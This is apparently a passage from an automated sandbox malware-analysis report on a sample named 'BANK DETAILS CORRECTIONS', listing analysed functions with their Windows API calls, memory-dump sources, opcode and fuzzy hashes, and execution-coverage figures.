                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 698806a08aa9b8faa9aa1c681b4670fb232929b563341ec5b09a648b59dd96e9
                                                                                    • Instruction ID: 63b93e5626d7030da8649a92760ef0b7156441e4d572d4bed179648c03d9f5bc
                                                                                    • Opcode Fuzzy Hash: 698806a08aa9b8faa9aa1c681b4670fb232929b563341ec5b09a648b59dd96e9
                                                                                    • Instruction Fuzzy Hash: AD1116B1D003488FDB20DFAAD4457EEBBF5EB88314F14842AD419A7640C679A945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D7540 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: dcfa16acdbb2267b45619844f3cca854d184240c36e54b14638c2291abc9c04a
                                                                                    • Instruction ID: f9015a6604885f1812a3ede8c71ddc981fdbc56d63a48c1f0e5a0e71ddcfa2b5
                                                                                    • Opcode Fuzzy Hash: dcfa16acdbb2267b45619844f3cca854d184240c36e54b14638c2291abc9c04a
                                                                                    • Instruction Fuzzy Hash: 7A1128B1D003488FDB20DFAAC44579EFBF4EF88324F148419D419A7240CA79A945CBA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076DC6CB Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076DC72D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 6be7a2281449c303c810b4c120e4b21cf13c413734f7d5be35c40fb3d0ad383d
                                                                                    • Instruction ID: 765118f5be31532376adae89bcfa159d57467b01ba2001e699160334c90b59f9
                                                                                    • Opcode Fuzzy Hash: 6be7a2281449c303c810b4c120e4b21cf13c413734f7d5be35c40fb3d0ad383d
                                                                                    • Instruction Fuzzy Hash: 3611F5B5800349DFDB20CF9AD485BDEFBF8EB48314F10841AE959A7610C375A944CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076DC040 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 076DC72D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: b10ceb36ba23bd2543f9a65fc2523648aac4a687f9c9e0c3fc3ca9bfab6566bc
                                                                                    • Instruction ID: b038dc4cca58c3a879e9a7e8f4aeea6c1a3069afa2a46053264746bc3e7074da
                                                                                    • Opcode Fuzzy Hash: b10ceb36ba23bd2543f9a65fc2523648aac4a687f9c9e0c3fc3ca9bfab6566bc
                                                                                    • Instruction Fuzzy Hash: AB11E0B5C04249DFDB20DF9AD489BDEBBF8EB48310F20841AE919A7200D375A944CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135B060 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B0C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 32fb4a883e1973367e47c1489236bf5f6ae094c51817ba18f0aedff2355e2866
                                                                                    • Instruction ID: dc5af5d5ed88895574fac68a93565446951aae6ee54a9d48e136ad8a24c84e4d
                                                                                    • Opcode Fuzzy Hash: 32fb4a883e1973367e47c1489236bf5f6ae094c51817ba18f0aedff2355e2866
                                                                                    • Instruction Fuzzy Hash: E0110FB6C00349CFDB20CF9AD444A9EFBF5EB88624F10842AD828A7610C375A549CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012ED1FC Relevance: .1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9b418fd1ffa8f1ea16b195b337810007e04cfc5b31584b5f227613e36abfe416
                                                                                    • Instruction ID: 7925cc86f072a38fe3aaec97154b5fe6e40c1b3a800d4da995777b00b88563af
                                                                                    • Opcode Fuzzy Hash: 9b418fd1ffa8f1ea16b195b337810007e04cfc5b31584b5f227613e36abfe416
                                                                                    • Instruction Fuzzy Hash: E6210372514248DFDF05DF94D9C8B26BBA5FB88320F60C5A9ED090B247C376D416CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012ED4C4 Relevance: .1, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3673ad46f6e62e7bb88411fe5869e69be3302bade7281af7a449f36749737418
                                                                                    • Instruction ID: b1d57d6776f3ce756954d1be91287065c96846ff9c3dd4136a3ea5b7bd81c431
                                                                                    • Opcode Fuzzy Hash: 3673ad46f6e62e7bb88411fe5869e69be3302bade7281af7a449f36749737418
                                                                                    • Instruction Fuzzy Hash: 04216472510348EFDB05DF54E9C8B26BFA5FB88318F60C56DE9090B246C336E456CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012FD01C Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a9fc5aeeafb62a8c0dd1641e1dcd3aed15db4b097e69169febe3bb06f4b13506
                                                                                    • Instruction ID: cee2bbb54c191a7469e34242964dea4d5f6391b3dc030cb7553cf0125db70c25
                                                                                    • Opcode Fuzzy Hash: a9fc5aeeafb62a8c0dd1641e1dcd3aed15db4b097e69169febe3bb06f4b13506
                                                                                    • Instruction Fuzzy Hash: 8D212271614308EFDB15DF64D980B16FB65EB84314F20C57DEA0A4B286C376D847CA62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012FD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cdd9b661f9bdcfae5f49bb66e280c579ccb89b8b30b4cb9a4bba5bb7c63a94db
                                                                                    • Instruction ID: 585c0d03cc2f10754b8be6836009443d93901c511e176889d40574a4029820fe
                                                                                    • Opcode Fuzzy Hash: cdd9b661f9bdcfae5f49bb66e280c579ccb89b8b30b4cb9a4bba5bb7c63a94db
                                                                                    • Instruction Fuzzy Hash: F521F579514208EFEB05DF94D5C0B16FB65FB84324F20C57DEA094B257C376D846CAA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012FD006 Relevance: .1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ad1fe63c9b8dc903d321c099314816c477bd513385557966c36bba52671943e2
                                                                                    • Instruction ID: 357c155340e8d3207fb82cb19d3a4e0ce28d8dfb063c3edc893d5ca28472dded
                                                                                    • Opcode Fuzzy Hash: ad1fe63c9b8dc903d321c099314816c477bd513385557966c36bba52671943e2
                                                                                    • Instruction Fuzzy Hash: C12179755093848FCB06CF24D990B15BF71EB46314F28C5EED9498B2A7C33A980ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012ED1F7 Relevance: .1, Instructions: 57COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b88339ba615690fe028a301bb2f216a6c218cacef3dec95ada981316a9e780e6
                                                                                    • Instruction ID: f81b2ad9d4a3af6607d0f09b22e556f544590480d1dbcabc35a142784fc49233
                                                                                    • Opcode Fuzzy Hash: b88339ba615690fe028a301bb2f216a6c218cacef3dec95ada981316a9e780e6
                                                                                    • Instruction Fuzzy Hash: E521CD76404244CFDB06CF54D9C4B16BFA2FB84320F24C1AADD080A257C33AD426CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012ED4BF Relevance: .1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                                                    • Instruction ID: 43ffea80da28ee88a35384cc67b35978ee35a94489055361eb44119b975f67c2
                                                                                    • Opcode Fuzzy Hash: a736483c7301ab0b942446287a2da93ee8c90a3553c7a0be40e84c1f23337044
                                                                                    • Instruction Fuzzy Hash: 31110376404284CFCB16CF54D9C4B16BFB1FB84314F24C6A9D9090B257C336D45ACBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012FD1CF Relevance: .1, Instructions: 53COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294548599.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12fd000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af0032d31c21eee98164703ed9ecbad4511e5bcd2f12e312fdd1ff5dc5c24f5f
                                                                                    • Instruction ID: 375e2a1ab76b01e16f52191cc413c6e413bf7c566afc697be15f3a83fb382514
                                                                                    • Opcode Fuzzy Hash: af0032d31c21eee98164703ed9ecbad4511e5bcd2f12e312fdd1ff5dc5c24f5f
                                                                                    • Instruction Fuzzy Hash: 5111BB7A544284DFDB06CF54C5C0B15FBA1FB84224F24C6AEDA494B297C33AD40ACBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012ED745 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d5c1ca597cd09c4d0917506a3b0c7c88a97a94b1ceac4abbb65061edda53ff4d
                                                                                    • Instruction ID: fa9fdace6f803af603b4a00945f9ab88c161574a2c0b076c9c274b8f65799aa5
                                                                                    • Opcode Fuzzy Hash: d5c1ca597cd09c4d0917506a3b0c7c88a97a94b1ceac4abbb65061edda53ff4d
                                                                                    • Instruction Fuzzy Hash: 3E012B314543889EF7144F55CCCCB27FFD8DF41624F44C51AEE195E286D2799840CAB2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 012ED744 Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294490567.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_12ed000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2140bb98836adb290b1f980584c9f3f4725bb2dafdd588e8b1aa7b1a4dd3d1f5
                                                                                    • Instruction ID: 28867571e5c35e79dff3f931fe5d849209ee045a5f67146e0473031633e5ae99
                                                                                    • Opcode Fuzzy Hash: 2140bb98836adb290b1f980584c9f3f4725bb2dafdd588e8b1aa7b1a4dd3d1f5
                                                                                    • Instruction Fuzzy Hash: 3CF062714053849EEB148F19CCC8B66FFD8EB41634F18C45AEE485E296C2799844CBB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 076D4CA8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: O5
                                                                                    • API String ID: 0-2171260883
                                                                                    • Opcode ID: 2d75b547eaffb02e603a0cef8e0a1a35572a208f63dd21151561051ddc07ae9e
                                                                                    • Instruction ID: 594bb5d96129847c646346cd4702fa177cababaa48e947787a950ff77a50227a
                                                                                    • Opcode Fuzzy Hash: 2d75b547eaffb02e603a0cef8e0a1a35572a208f63dd21151561051ddc07ae9e
                                                                                    • Instruction Fuzzy Hash: 56E1EAB4E10259CFDB14DFA9C580AAEFBB2BF89304F248169D815A7355DB319D42CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076DDC48 Relevance: .4, Instructions: 399COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f9df12499ae91bc1c580ff4cb4786ffa2db1abef037b2cb9cd53b6af7564a95a
                                                                                    • Instruction ID: e1a311ec9ac6dbe980acf456db32750036cf53737cecd9836290ef7ca2d14607
                                                                                    • Opcode Fuzzy Hash: f9df12499ae91bc1c580ff4cb4786ffa2db1abef037b2cb9cd53b6af7564a95a
                                                                                    • Instruction Fuzzy Hash: F2E1ADB1B103018FEB29EB79C450BAAB7E6AF89600F14846ED54ADB390DB35DC05CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 053B0040 Relevance: .3, Instructions: 315COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d1126008b24c020ef66f9bdc3f5f9f9ce16ea323944a49413640a396758b381a
                                                                                    • Instruction ID: 9d169f5731dffa1d974ef4ce6ca93d1c7126d6d9bfac756e54510064c8dbe717
                                                                                    • Opcode Fuzzy Hash: d1126008b24c020ef66f9bdc3f5f9f9ce16ea323944a49413640a396758b381a
                                                                                    • Instruction Fuzzy Hash: 8E1296B0C81745CAE712CF69F84C1893BB1B785328FD04B29E2652B3E5DBB5196ACF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D76C8 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 59048d813cb208ee27a468da9f6b3cf1ee1d4c8485539ea63f96507e8c8c32aa
                                                                                    • Instruction ID: 596697bf59677c66ed07e1dc8d50495059c90bbc9a349b220000fb0b7008a1eb
                                                                                    • Opcode Fuzzy Hash: 59048d813cb208ee27a468da9f6b3cf1ee1d4c8485539ea63f96507e8c8c32aa
                                                                                    • Instruction Fuzzy Hash: 21E1C7B4E10219CFDB14DFA9C580AAEFBB2BF89304F248169D415AB355D731AD42CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D50E0 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b767ed059cc6ed58339187e9a560c8b7d098faac868a74db90c7fcaf740c7e29
                                                                                    • Instruction ID: 4c383bda2e43e2545082adc12c8fb5612274d563143fb04127a0c2080ea2883b
                                                                                    • Opcode Fuzzy Hash: b767ed059cc6ed58339187e9a560c8b7d098faac868a74db90c7fcaf740c7e29
                                                                                    • Instruction Fuzzy Hash: 60E11DB4E10219CFDB14DFA9C580AAEFBB2BF89304F248159D416AB356D7709D41CF61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D6D18 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 64335595c8046a9f941ca2f0b4f68dd2787d4d4ee4d9f7793915ede0fa2c653b
                                                                                    • Instruction ID: 214604ed3cc1f32449721503717c39eb87238a0a4810c14cc280cd147d5cc290
                                                                                    • Opcode Fuzzy Hash: 64335595c8046a9f941ca2f0b4f68dd2787d4d4ee4d9f7793915ede0fa2c653b
                                                                                    • Instruction Fuzzy Hash: 70E1E6B4E10219CFDB14DFA9C580AAEFBB2BF89304F248169D415AB355D731AD42CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D68E0 Relevance: .3, Instructions: 312COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39b80a805ea2072f0af56d5d2a23ee600c2f0fe502d7ec9b761b6d41b074fa0b
                                                                                    • Instruction ID: d4328f15d6050460531d6f5a074f72bc41da97869d1cd6edd0a9e0166f9ba123
                                                                                    • Opcode Fuzzy Hash: 39b80a805ea2072f0af56d5d2a23ee600c2f0fe502d7ec9b761b6d41b074fa0b
                                                                                    • Instruction Fuzzy Hash: 7DE1D7B4E10219CFDB14DFA9C580AAEBBB2FF89304F248169D455AB355D731AD42CFA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076DE900 Relevance: .3, Instructions: 298COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a031c75091ceb54c4d4f2f94b31614c391c49a215df424003de7c139ac3a87b
                                                                                    • Instruction ID: 73c28f3e754539cc82e3a7d5f453bf3708964c61c311e2eab8f5c9b13fddc7e2
                                                                                    • Opcode Fuzzy Hash: 8a031c75091ceb54c4d4f2f94b31614c391c49a215df424003de7c139ac3a87b
                                                                                    • Instruction Fuzzy Hash: 0FD1A574A10609CFDB18DF69C598AA9B7F1BF4D701F2580A9E406EB361DB32AD41CF60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0135DCB4 Relevance: .3, Instructions: 264COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1294856028.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1350000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 438ce0567afa503a6e59ab49dbe092871e59a1769626b9cbe3348d319b8c717a
                                                                                    • Instruction ID: f77083d68cb97f2a440dec388304ce2ee3b265658375531ea88bc4e48c3db086
                                                                                    • Opcode Fuzzy Hash: 438ce0567afa503a6e59ab49dbe092871e59a1769626b9cbe3348d319b8c717a
                                                                                    • Instruction Fuzzy Hash: 9DA17F36E0021ACFCF05DFB8C4409AEBBF6FF84708B15456AE905AB265DB71E955CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 053B1490 Relevance: .2, Instructions: 242COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 82a7da8186e363c91d9a4581f417e99deac53587b58c35899c5da3c2a54affab
                                                                                    • Instruction ID: a0624fa76c6b7c0579f74b29be2a5b37d3668dde4a97178369923848455e1042
                                                                                    • Opcode Fuzzy Hash: 82a7da8186e363c91d9a4581f417e99deac53587b58c35899c5da3c2a54affab
                                                                                    • Instruction Fuzzy Hash: 1C917270B007058FDB14EF79D494A6EBBF6FF88204B548929D80ADB755EBB0E845CB84
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 053B0006 Relevance: .2, Instructions: 236COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1301606735.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_53b0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f4e8eed3193630924bcdde9f7b15a7948b5c21ef0f6886f1a96798d896af9052
                                                                                    • Instruction ID: aad40ab48ffb0c0c2d331d30b595e3c930420343a5715b4604a07c9d553e1a3f
                                                                                    • Opcode Fuzzy Hash: f4e8eed3193630924bcdde9f7b15a7948b5c21ef0f6886f1a96798d896af9052
                                                                                    • Instruction Fuzzy Hash: B8C11AB0C81745CFE712CF69F8482897BB1BB81324F954B29E1616B3D1DBB8196ACF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 076D6D0B Relevance: .1, Instructions: 133COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1303819472.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_BANK DETAILS CORRECTIONS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 127f40c8047f559e3ba2a161ba32ecb602e5413010f64fb0fa847467ab251041
                                                                                    • Instruction ID: 5b7519814a667bfc42d2a3c04035a794025d54ffb7896226cda7cc6f720d66a8
                                                                                    • Opcode Fuzzy Hash: 127f40c8047f559e3ba2a161ba32ecb602e5413010f64fb0fa847467ab251041
                                                                                    • Instruction Fuzzy Hash: BF513BB4E142198FDB14CFA9C5809AEFBF2BF89304F24816AD419A7356D7319D42CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.4%
                                                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                                                    Signature Coverage:16.2%
                                                                                    Total number of Nodes:278
                                                                                    Total number of Limit Nodes:26
